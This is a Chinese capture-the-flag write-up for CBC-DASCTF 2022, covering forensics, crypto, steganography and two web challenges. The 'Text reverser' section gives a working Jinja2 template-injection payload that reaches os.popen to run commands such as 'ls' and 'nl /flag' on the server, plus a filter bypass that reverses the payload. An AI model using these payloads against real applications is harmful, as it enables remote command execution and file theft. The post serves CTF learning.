CBC-DASCTF

CBC-DAS

difficult (for me)

Posted by JBNRZ on 2022-09-21
Estimated Reading Time 9 Minutes
Words 1.8k In Total
Viewed Times

Misc

easy_keyboard

题解(思路

  1. 下载附件,写脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
import re
key_pattern = re.compile('KeyDown "(.*?)"')
with open('secret.Q', 'r') as r:
    content = r.readlines()
a = []
for i in content:
    b = re.findall(key_pattern, i)
    if b:
        a.append(b[0].lower())
print(a)
a = ''.join(a)
a = a.replace('shift', '').replace("backspace", '\b').replace('space', ' ').replace('num ', '')
print(a)
  1. 得到输出的内容
1
2
3
4
5
6
if you want to decrypt the zip file.you need to get the key.i am a very good person.
so i will give you the key directly.the key is very easy.
as long as you get the key and you can see the files in the compressed zip
.fine1it's time to give you the key.the key is 123456.
oh1sorry.this is the key of my bank card password.
the true key is 6e187bef.the key is 6e187bef.the key is 64187bef
  1. 然后就做不出来了,直接将backspace的内容忽略了
  2. 重写脚本,不替换 backspace
1
2
3
4
5
6
7
8
9
if you want to decrypt the zip file.you need to geyt  t the key.
i am a very good person.so i i will give you the key dirte  ectly.
the key is very easy.
as long as you get the key and you can see the files in the compressed zu ip.
fine1it's time to give you the key.the key is 123456.oh1 sorr     sorry.
this is the key of my vba   banc k card password.
the ture   t rue key is 6e187bef.
the key2  is 323d1a4b        6e187bef.
the key3  is f 0 6 7 e c 9 4 64187bef
  1. 得到三个密码

6e187bef
323d1a4b
f067ec94

  1. 然后就没有然后了
  2. 学习到新东西:这三个 4 字节可能为 zip 明文攻击的密钥,用 archpr 破解密码
    key 1
  3. 解压得到一份 USB 流量,提取流量(又是新东西,摘自官方 WriteUp

tshark -r keyboard.pcapng -T fields -e usbhid.data > usbdata.txt
得到的usb.txt中发现是4f,50,51,52,并不在一般的键盘按键范围,于是查找键盘按键https://max.book118.com/html/2017/0407/99227972.shtm
发现对应的是箭头

1
→↓←↓→ ↓→↑↓↓ ↓→↑↓↓ →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓↓ →↓↓ ↓↓ →↓↓ →↓↓ ↓↓ →↓←→↓← →↓←↓→↑←↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓ →↓↓↑←↑ →↓↓←↑↑ →↓←↓→ →↓↓←↑↑ ↓↓→↑← →←↓→↓← →↓↓←↑↑ ↓→↑↓↓ →↓←→↓← →←↓→↓← →↓←↓→↑←↑ →↓←↓→↑←↑ →←↓→↓← →←↓→↓← ↓↓ →↓←↓→ →↓←↓→↑←↑ →↓←→↓← →↓↓↑←↑ →↓↓↑←↑ →←↓→↓← ↓↓ ↓↓→↑← →↓←→↓← →↓↓←↑↑ →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓←↓→ ↓→↑↓↓ →↓←↓→↑←↑ ↓↓→↑← ↓↓ ↓↓→↑← →↓↓ →↓←↓→↑←↑ →↓↓↑←↑ ↓↓ →←↓→↓← →↓↓↑←↑ →↓↓↑←↑ →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓←↑↑ →↓↓ ↓→↑↓↓ →↓←→↓← →↓↓↑←↑ ↓↓→↑← ↓→↑↓↓ →↓←↓→↑←↑ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ →↓←→↓← ↓→↑↓↓ ↓↓→↑← →↓←→↓← ↓→↑↓↓ ↓↓ →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓←↓→ →↓←↓→↑←↑ →↓↓↑←↑ ↓→↑↓↓ →↓←↓→ →↓←↓→↑←↑ ↓↓→↑← →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓↓←↑↑ ↓↓→↑← ↓→↑↓↓ →↓↓←↑↑ ↓↓→↑← →↓←→↓← →↓↓
  1. exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from PIL import Image
str = "4f5150514f00514f52515100514f525151004f50514f5150004f5151525052004f5150514f5250520051514f5250004f5151004f5151005151004f5151004f5151005151004f51504f5150004f5150514f5250520051514f5250004f5150514f525052004f5151004f5151525052004f5151505252004f5150514f004f51515052520051514f5250004f50514f5150004f515150525200514f525151004f51504f5150004f50514f5150004f5150514f525052004f5150514f525052004f50514f5150004f50514f5150005151004f5150514f004f5150514f525052004f51504f5150004f5151525052004f5151525052004f50514f51500051510051514f5250004f51504f5150004f5151505252004f5151525052004f5150514f5250520051514f5250004f5150514f00514f525151004f5150514f5250520051514f52500051510051514f5250004f5151004f5150514f525052004f5151525052005151004f50514f5150004f5151525052004f5151525052004f51515052520051514f5250004f5150514f525052004f5151505252004f515100514f525151004f51504f5150004f51515250520051514f525000514f525151004f5150514f525052004f5151505252004f51504f5150004f50514f5150004f5151525052004f5150514f525052004f51504f515000514f5251510051514f5250004f51504f515000514f525151005151004f5151505252004f5151004f5151505252004f51504f5150004f50514f5150004f51515052520051514f5250004f5150514f525052004f5150514f004f5150514f525052004f515152505200514f525151004f5150514f004f5150514f5250520051514f5250004f5151505252004f5151004f5151505252004f51515052520051514f525000514f525151004f51515052520051514f5250004f51504f5150004f515100"
img = Image.new('RGB', (len(str), len(str)))
i = 0
j = 5
print(len(str))
for n in range(len(str) // 2 -1):
    print(str[n*2:(n+1)*2])
    if str[n*2:(n+1)*2] == '4f':
        for k in range(6):
            i += 1
            img.putpixel((i, j), (255, 255,255 ))

    if str[n*2:(n+1)*2] == '51':
        for k in range(6):
            j += 1
            # r, g, b = img.getpixel((i, j))
            img.putpixel((i, j), (255, 255, 255))
    if str[n*2:(n+1)*2] == '50':
        for k in range(6):
            i -= 1
            # r, g, b = img.getpixel((i, j))
            img.putpixel((i, j), (255, 255, 255))
    if str[n*2:(n+1)*2] == '52':
        for k in range(6):
            j -= 1
            # r, g, b = img.getpixel((i, j))
            img.putpixel((i, j), (255, 255, 255))
    if str[n*2:(n+1)*2] == '00':
        j = 5
        i = i + 10
img.show()

2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637

1
2
3
4
import binascii
from libnum import *
flag=2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637
print(n2s(flag))

另一个 exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import libnum
f = open("keyboard.pcapng","rb").read()
pos = 1340
draws = ["622488","22","62426","624624","26822","642624","22684","622","62426848","622848"]
chars = ["0","1","2","3","4","5","6","7","8","9"]
c = ""
while(pos < len(f)):
    data = f[pos+57]
    if(data == 0x52):
        c += "8"
    elif(data == 0x51):
        c += "2"
    elif(data == 0x50):
        c += "4"
    elif(data == 0x4f):
        c += "6"
    elif(data == 0):
        c += " "
    pos += 0x80
c = c.split(" ")[:-1]
ans = ""
for i in c:
    ans += chars[draws.index(i)]
print(libnum.n2s(int(ans)))

what_is_it.piz

题解(思路

  1. 下载附件,010打开
  2. 根据 .piz 感觉一个是倒着的zip,写脚本复原
1
2
3
4
5
6
7
8
9
10
b = []
a = ... # 导出的 16进制数据
for i in a:
    b.append(i)
c = []
for i in range(len(b)):
    c.append(b[len(b) - i - 1])
with open('a.txt', 'w') as w:
    w.write(''.join(c))
# 再导入至010
  1. 删去文件头前多余的00,得到正常文件
  2. 解压后发现是一个word,修改压缩包后缀,改为 .doc
  3. 打开,发现一首歌,搜索原歌词,比对内容将错误的单词缺少的字母提出来

hylqeygvs

  1. 根据题目的提示信息,需要爆破字母的排列顺序
  2. 官方 EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from string import ascii_uppercase as uppercase
from itertools import cycle
import hashlib

table = dict()
for ch in uppercase:
    index = uppercase.index(ch)
    table[ch] = uppercase[index:] + uppercase[:index]

deTable = {'A': 'A'}
start = 'Z'
for ch in uppercase[1:]:
    index = uppercase.index(ch)
    deTable[ch] = chr(ord(start) + 1 - index)



def deKey(key):
    return ''.join([deTable[i] for i in key])



def encrypt(plainText, key):
    result = []
    # 创建cycle对象,支持密钥字母的循环使用
    currentKey = cycle(key)
    for ch in plainText:
        if 'A' <= ch <= 'Z':
            index = uppercase.index(ch)
            # 获取密钥字母
            ck = next(currentKey)
            result.append(table[ck][index])
        else:
            result.append(ch)
    return ''.join(result)



key = "TREX"
keys = deKey(key)



def Pailie(list1, start, end):
    if start == end:
        q = "".join(list1)
        ans = encrypt(q, keys)
        # print(ans)
        flag = hashlib.md5(ans.encode()).hexdigest()
        if ("5613a" in flag[0:5]):
            print(flag)
    else:
        for i in range(start, end + 1):
            list1[start], list1[i] = list1[i], list1[start]
            Pailie(list1, start + 1, end)
            list1[start], list1[i] = list1[i], list1[start]



mw = ['H', 'Y', 'L', 'E', 'V', 'S', 'G', 'Q', 'Y']
Pailie(mw, 0, len(mw) - 1)

mask

  1. 把zip放入16进制编辑器中,发现文件尾有rar
    mask 1
  2. 把rar提取出来,得到自定义掩码的运算规则
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
mask0:(i+j) % 2
mask1:j % 2
mask2:i % 3
mask3:(i+j) % 3
mask4:(i//3+j//2)%2
mask5:(i*j)%3+(i*j)%2
mask6:((i*j)%3+i*j)%2
mask7:((i*j)%3+i+j)%2
mask8:(i*j) % 2
mask9:(i*j) % 3
mask10:(i^j) % 3
mask11:(i^j) % 2
mask12:(i//3+j//2)%3
mask13:(i^j)%3+(i^j)%2
mask14:((i^j)%3+i^j)%2
mask15:((i^j)%3+i+j)%2

这里就是重新定义的16种掩码,前8种是原始的掩码生成方式,只是换了一下顺序,所以去扫所有的二维码的时候,可能会发现有的二维码还是能直接扫出来,那就是在生成的时候随机刚好随机到了自己原来的源码

  1. 任意一个二维码的png放入stegsolve中,可以发现在r0的左上角有隐写痕迹
    mask 2

多看几张图,可以发现就只有前四格存在隐写,结合描述说掩码的识别特征不在二维码区域,所以可以知道这个4位的数据就是16种掩码的特征位…
mask 3
完全没看懂,等学了再自己写

web

小恐龙

题解

(唯一做出来的一道【哭】

  1. 打开网页,查看源代码,有个 什么js文件,格式化代码后阅读源码
  2. 找到几个变量

salt (还有个忘了
sn() 函数

  1. 发现sn就是生成 post 参数的函数,直接复制到控制台
  2. 执行 sn(1000000, ‘salt + (忘了的部分) + 1000000’)
  3. 得到flag

Text reverser

题解

  1. 应该是ssti,发现了一大堆过滤,发现它只会检测我们传过去的原生数据,不会检测那边反转好的字符串,如果我们传入反转后的即可绕过
  2. 跑一下
1
2
output = '''{% print "".__class__.__bases__[0].__subclasses__()%}'''[::-1]
print(output)

}%)(sessalcbus.]0[sesab.ssalc.“” tnirp %{

  1. 发送反转后的payload 得到类列表,然后将返回的列表内容复制进脚本寻找可利用的类
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import json

a = """
<class 'type'>...<class 'unicodedata.UCD'>
"""

num = 0
allList = []

result = ""
for i in a:
    if i == ">":
        result += i
        allList.append(result)
        result = ""
    elif i == "\n" or i == ",":
        continue
    else:
        result += i
        
for k,v in enumerate(allList):
    if "os._wrap_close" in v:
        print(str(k)+"--->"+v)
  1. 之后利用popen方法执行系统命令
    {% print "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('ls').read()%}
    }%)(daer.)'galf/ ln'(]'nepop'[__slabolg__.__tini__.]231[)(__sessalcbus__.]0[__sesab__.__ssalc__."" tnirp %{
  2. 这里过滤了很多读取文件的命令,可以利用nl的绕过过滤读取文件(后测试用grep和rev等命令也可以读取flag)

如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !

特色标签
CBC-DASCTF
链友
ESC